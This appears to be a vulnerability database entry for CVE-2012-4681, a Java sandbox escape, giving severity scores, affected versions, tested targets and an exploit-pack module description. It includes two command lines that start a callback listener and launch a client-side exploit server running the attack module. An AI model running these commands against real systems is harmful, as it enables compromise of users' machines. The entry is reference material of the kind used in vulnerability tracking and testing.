10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
Name | java_forName_getField |
---|---|
CVE | CVE-2012-4681 Exploit Pack |
VENDOR: Sun | |
Notes: | |
There is a method invocation vulnerability using sun.awt.SunToolkit.getField() | |
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox. |
Affected versions
JDK and JRE 7 Update 6 and earlier
Note: this does not work under JRE 6 due to the getField() function not working correctly.
Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 6
- Windows XP SP3 with JDK/JRE 7 and 7 update 6
Needs more testing (likley to work on other targets)
To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0
Repeatability: Infinite (client side - no crash)
References: http://pastie.org/4594319
Date public: 07/26/2012